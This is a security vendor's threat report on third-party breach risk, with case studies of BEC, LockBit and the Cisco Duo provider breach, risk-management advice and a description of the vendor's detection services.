Key Points

  • Third-party breaches can severely affect customer organizations, leading to financial losses, reputational damage, and operational disruptions.
  • The prevalence of third-party breaches is extremely high, with an estimated 98% of organizations having affiliations with at least one third party that has been breached.
  • Organizations in the healthcare and financial services sectors generally face heightened risks due to greater reliance on third-party services.
  • Threat actors including “Clop” and “LockBit” often use third-party compromise as an attack vector to target other organizations.
  • ReliaQuest uses a variety of proactive methods to detect third-party breaches and has developed automated response plays to quickly contain the threat posed by such breaches in customer environments.

Most organizations work with countless third-party vendors and suppliers in relationships that are not only necessary but also fruitful, contributing to increased revenue, customer retention, and access to outside resources and expertise. In the digital age, the number of these collaborations has surged, offering financial benefit but also presenting significant security challenges. This report will outline the definition and scope of third-party risk, analyze various real-world examples, and provide strategic insights into managing these risks effectively. Additionally, it will detail ReliaQuest’s robust detection and response strategies aimed at protecting organizations from the threat of third-party compromise.

Defining Third-Party Risk

Third-party risk refers to the potential for your organization to be negatively affected if a vendor or supplier is impacted by a cyber incident. The scope of third-party risk is vast, encompassing all the possible impacts of security breaches affecting vendors or suppliers, regardless of scale. Depending on the nature of the third-party breach, the consequences for customer organizations can be diverse, as indicated by the following non-exhaustive examples.

  • A critical function provided by a third party, such as password management or multifactor authentication (MFA), is disabled in a cyber attack, resulting in operational downtime for customer organizations. Such operational downtime can cause both immediate impact to revenue and more intangible damage to trust in the customer organization as clients question the reliability of services.
  • A third party with access to sensitive data is breached, leading to credential or proprietary information exposure for a customer organization. This can cause reputational as well as financial damage to the customer organization, particularly if the third party is in possession of sensitive intellectual property. In the aerospace industry, for example, breaches of third-party parts suppliers have led to leaks of aircraft design schematics, which can then be accessed by competitors.
  • Business email compromise (BEC)—whereby a third-party provider is compromised to send malicious email—enables threat actors to carry out highly targeted phishing attacks. By sending emails from trusted domains, threat actors can appear highly convincing when attempting to coerce recipients to make payments or disclose confidential information. The consequences for victim organizations, either financial or reputational, can be severe. In 2015, a US-based IT company was the victim of a fraud worth $46.7 million because of threat actors impersonating employees at a third-party company.
  • A third party responsible for storing customer data is breached, leading to compromise of that data. In 2021, for example, details of 8,000 patients were leaked in a breach affecting the cloud services provider of a US-based healthcare provider. These types of breaches can have wide-ranging financial and reputational impacts, depending on the nature of the data compromised.
  • A breach targeting a third party essential to a customer organization’s supply chain disrupts the organization’s capacity to provide products or services to their clients. For example, in March 2022, operations were suspended at 14 plants of a Japanese car manufacturer due to a cyberattack affecting a plastic parts supplier. Although the network of the car manufacturer was not affected at all by the breach, the downstream effects on production were severe, with the incident causing an estimated 5% drop in output over the month.

Significance of Third-Party Risk

Whether or not a third-party breach leads to a direct attack on a customer organization, other repercussions—ranging from exposed data and service downtime to supply chain disruptions—can still inflict significant damage. It is estimated that 98% of organizations are affiliated with at least one third party that has suffered a breach, meaning that almost every company is at immediate risk of the direct or indirect consequences of a third-party breach. Multiple threat actors including “LockBit” and “Clop” use third-party compromise as an attack vector to target other organizations, with the efficacy of large-scale ransomware campaigns such as the Clop “MOVEit” campaign being partly determined by its impacts via the third-party vector. The prevalence of third-party breaches is expected to remain high throughout 2024, with certain kinds of breach showing particular popularity. For example, ReliaQuest observed a marked increase in BEC attacks through 2023 due to advances in techniques and their potential lucrativeness, a trend which is set to continue throughout 2024.

The sheer volume of companies associated with third parties that have been compromised shows that third-party risk is a global problem that can affect organizations in all industries. However, the risk is particularly pronounced in the healthcare and social assistance and financial services sectors, which tend to be more dependent on third-party service providers. In the healthcare sector, for example, reliance on external providers for core functionalities such as data storage means the consequences of third-party breaches can be particularly severe, often leading to the release or threatened release of highly sensitive patient data. Recognizing the seriousness with which organizations view third-party compromises, threat actors sometimes allege breaches on major third-party providers to exert pressure on them. For instance, in an incident that began in May 2024, the threat actor “ShinyHunters” claimed to have breached the cloud-services provider Snowflake, demanding a $20 million ransom for leaked data from two of their customers. Although Snowflake maintains that these breaches were not third-party and resulted from customer use of single-factor rather than multifactor authentication, the allegations nevertheless caused substantial concern among their customers and sparked ongoing speculation about the validity of the threat actors’ claims.

Why Are Third-Party Providers Targeted?

  • Strategic Access to Multiple Networks: Threat actors including LockBit and Clop often choose to target third-party service providers as a strategic entry point. By breaching these providers, attackers can potentially gain access to the networks of multiple client companies simultaneously. This approach significantly increases the reach and impact of a campaign without the need to develop approaches to individually breach each company, making it an effective strategy that maximizes the potential of a threat actor’s resources. One notable example of this type of breach was a 2023 Lazarus Group campaign that had the potential to compromise over 600,000 companies via a trojanized version of the 3CX Desktop Client.
  • Exploiting Weaker Security Postures: In some instances, threat actors intentionally target third-party providers that have weaker security postures compared to their more secure clients. This method allows attackers to bypass the robust defenses of a large organization by first infiltrating a less secure third party that has trusted access to the larger organization’s network. Once a third party is breached, the attackers can either access proprietary information entrusted to the third party, or move laterally to attack the main target, facilitating a breach that might otherwise be too challenging or resource intensive. Examples of these kinds of breaches include LockBit targeting a US aerospace company via a third-party manufacturer and DoppelPaymer targeting aerospace firms via a parts supplier.
  • Opportunistic Attacks: While many third-party breaches are strategic, some may be more opportunistic. Attackers might target a third-party provider primarily to exploit that company’s own assets, data, or resources. In these cases, any subsequent impact on the third party’s clients is collateral rather than the primary intent. This type of attack underscores the inherent vulnerabilities that exist when organizations rely on external partners, highlighting the need for comprehensive security assessments of all third-party relationships.

Case Studies

In this section, we examine three case studies highlighting some of the various attack vectors and impacts that characterize third-party breaches. The first two case studies show how third-party breaches posed direct risks to customer environments, while the third extends the focus to the downstream effects of attacks on infrastructure managed by a fourth party.

Storm-1167 Targets Organization with BEC Attack

In October 2023, ReliaQuest uncovered a security incident in which a customer was targeted with over 1,000 phishing emails originating from a compromised third-party business email account. The attack was linked to the “Storm-1167” threat actor, which used a phishing link to lead victims to a fraudulent Microsoft sign-in page and capture their session tokens. These tokens allowed the attacker to access the customer’s internal email and cloud services.

A compromised internal account was subsequently used to send an additional 1,300 emails with a credential harvester, suggesting an attempt to target higher-privilege accounts and widen the attack’s scope. To delay detection, the threat actor created email rules to auto-forward emails containing specific keywords to a designated folder. ReliaQuest escalated the incident, advising the customer to rotate account credentials, block the sender and domain, and clear the phishing emails from recipients’ inboxes.

This incident highlights how business email compromise can result in multi-level breaches, with the initial compromise of the third party used as a basis for a further phishing campaign against the customer using emails sent using their own domain. The potential for compromised email addresses to be used against other entities in a continuing attack chain highlights that third-party breaches such as these can have far-reaching consequences. Although preventing sophisticated BEC attempts like this is difficult, it is essential to ensure that strong email authentication measures are in place to offer the best possible defense. This includes monitoring and blocking emails even from trusted domains if they resemble those used in BEC attempts. For emails that do manage to bypass detections, ReliaQuest’s GreyMatter Phishing Analyzer is a useful tool for automatically evaluating and removing emails reported as suspicious and initiating response actions.

LockBit Attempts Breach of Healthcare Organization via Compromised Third-Party Account

In October 2023, ReliaQuest detected a user from a customer in the healthcare and social assistance sector attempting an unusual process via a PowerShell command. Our analysis revealed that the account executing the PowerShell command was a compromised third-party administrator account.

After compromising the third-party account, the threat actor attempted to download the executable file “cortex.exe” in the customer environment from the IP address 185.212.128[.]41. An endpoint detection and response (EDR) tool blocked this download; however, our analysis indicated that the cortex.exe file was a “LockBit 3.0” executable, related to the LockBit ransomware group. It is highly likely the customer had been targeted by a LockBit ransomware attack via the third party.

After the download was blocked, ReliaQuest took further steps to ensure that the customer environment remained secure. We recommended that the customer isolate the host and terminate any ongoing sessions linked to the compromised account. After mitigating the immediate threat, ReliaQuest advised rotating the user’s credentials and reimaging the affected host. We then blocked all indicators of compromise (IoCs). This ensured that LockBit would no longer be able to use the compromised account to carry out further malicious activities toward the customer, and that if they had discovered any customer credentials during the initial compromise, these would be unusable.

How the third party was compromised in this case is not known; however, targeting third-party providers has become a common strategy for ransomware groups, like LockBit and Clop. To reduce the possibility of threat groups using this attack vector, it is essential for organizations to carefully vet vendors and suppliers. To make it as difficult as possible for threat actors to use third-party administrator accounts, it is important to ensure that all accounts use multifactor authentication, and all credentials are unique for each organization the third party interacts with. Additionally, make sure that the principle of least privilege is adhered to: If third parties have access to your environment, they should only have access to the parts of your environment necessary to complete the tasks they are responsible for.

Breach of Fourth-Party Provider Impacts Cisco Duo and its Customers

On April 1, 2024, MFA service provider, Cisco Duo, informed customers that an unnamed provider who handled the company’s SMS and voice over IP (VoIP) MFA messages had been compromised due to a phishing incident. The threat actor who targeted the provider downloaded SMS and VoIP message logs associated with specific Duo accounts. The data in the logs contained the phone number, carrier, location data and date, time, and message type from employees of customer organizations. At the time of writing, it is not known if threat actors have breached Cisco Duo customer environments using this stolen data.

The Cisco Duo vendor breach underscores the efforts by threat actors to target critical components of corporate security architecture. By focusing on third- and sometimes fourth-party providers, threat actors can exploit the dependencies that corporations have on their service providers, critical for functions like MFA. In this case, the threat actor used phishing to obtain credentials from an employee at a provider for Cisco Duo, highlighting how far outside the control of Cisco Duo customers the incident was.

Best Practices for Managing Third-Party Risk

Effective management of third-party risk is essential for maintaining the security and integrity of an organization’s operations. Third-party risk management is inherently challenging because it involves variables outside an organization’s direct control, necessitating a proactive approach to understanding these risks and preparing strategic responses for potential worst-case scenarios. The best practices detailed here can help organizations mitigate risks associated with their third-party relationships.

  • Identify Third Parties: Organizations should ensure they are aware of who all of their third-party providers are, the functions they perform, the level of access they have to the organization’s systems, and the type of data stored by each party. Gaining clarity on the reach and role of third-party providers is crucial for mapping out the attack surface of your organization, which is in turn essential for building effective defensive strategies.
  • Assess Criticality and Risk: Understanding the criticality of a third party involves assessing its importance to your operations and the impact of its potential failure, while risk evaluation considers both the severity and likelihood of that failure. Evaluating the criticality of third-party entities and understanding their associated risks helps in making informed choices around the outsourcing of particular tasks or services. For instance, if a third-party responsible for a crucial function is deemed high-risk due to their history of not disclosing past cyber incidents, it might be appropriate to transition to a different provider or explore the feasibility and benefits of managing the function internally.
  • Continuously Monitor: Continuously monitoring the criticality and risk associated with third-party services is essential because these factors are not static; they can change as the global threat environment, internal priorities, and the third-party’s own systems evolve. Relying solely on one-off assessments can lead to gaps in risk management and increase the risk of damaging third-party breaches affecting your organization, as shifts in the cyber threat landscape and third-party performance can occur at any time.
  • Consider Systemic Risks: When a third party provides multiple critical functions, or where multiple organizations in the same sector use a single third-party provider, the risks from incidents involving third parties are compounded. Organizations are encouraged to improve information sharing on third-party relationships and should factor in the extent of a third party’s integration and prevalence within the industry when assessing its risk. One study on the financial sector found that 78% of organizations had experienced a third-party breach over a period of a year, but only 3% of third-party vendors had been breached. This demonstrates how extensive use of third parties and strong reliance on specific providers can lead to systemic risks for an entire sector.
  • Implement Incident Response Plans: Ensure that your organization has established response plans to effectively address reports of third-party breaches and, if necessary, implement remedial actions to secure your environment. Organizations should implement robust systems to ensure that critical functions carried out by external providers can continue in the event of cyber incidents involving third parties. Contingencies could include transferring functions back to the organization or to another third party. To enhance response plans for third-party breaches, organizations can conduct tabletop exercises or workshops, which serve as practical simulations to map out and practice their response strategies. These exercises help identify potential weaknesses in the response plan and provide a forum for team members to familiarize themselves with potential remedial actions during crisis scenarios, thereby improving readiness and response efficacy.

What ReliaQuest Is Doing

ReliaQuest uses multiple methods to detect third-party breaches, while also deploying effective detection, containment, and response mechanisms to protect customers if data compromised in a third-party breach is used to target their environment.

Detecting Third-Party Breaches

Detecting third-party breaches poses a significant challenge, as they often only come to light when they are publicly announced or when compromised data is used in subsequent attempts to breach customer environments. Additional complicating factors exacerbate this issue. For instance, a third party may be reluctant to disclose that it has been compromised in a cyberattack, fearing the potential reputational damage and customer loss that could occur as a result. In addition, there are multiple contexts in which a third party might not be aware of a breach, particularly if they have been targeted by an advanced persistent threat (APT) group specializing in espionage operations. In such instances, the APT would compromise systems but maintain a low profile to avoid detection, quietly gathering sensitive information to be used in attacks against other organizations. In some cases, a subsequent cyber attack might never be linked back to the compromise of a third party. Consider a scenario, for example, where a customer organization is hit by a spearphishing campaign that uses proprietary information obtained from a third-party breach. If the phishing emails originate from unrelated domains and use this information subtly, without making explicit references, pinpointing the origins of the attack becomes almost impossible.

To enhance awareness of third-party compromises, organizations can use ReliaQuest’s Threat News Tippers and Intelligence Updates, which highlight significant breaches reported in the media, including those related to major third-party service providers. In addition, Ransomware Tippers identify organizations that have been listed on leak sites operated by ransomware groups.

For GreyMatter Digital Risk Protection customers, additional functionalities are available. This service continuously monitors the open, deep, and dark web, including closed and technical sources, for third-party data breaches relevant to customers, including billions of files exposed via misconfigured S3 buckets, file transfer protocol (FTP), RSync and server message block (SMB). In 2023 alone, we discovered over 6 billion exposed credentials in breached data on the clear and dark web, bringing the total number we have found to more than 36 billion. Monitoring the clear and dark web in this way ensures that customers are promptly informed not only when third parties are directly breached, but also when inadequate security practices by third parties allow threat actors to access sensitive data.

Detection Rules

ReliaQuest is committed to safeguarding our customers against the wide-ranging threats that could arise from third-party compromises. Our detection rules and response plays help defenders react rapidly when threat actors are attempting breaches using data obtained from third-party compromises.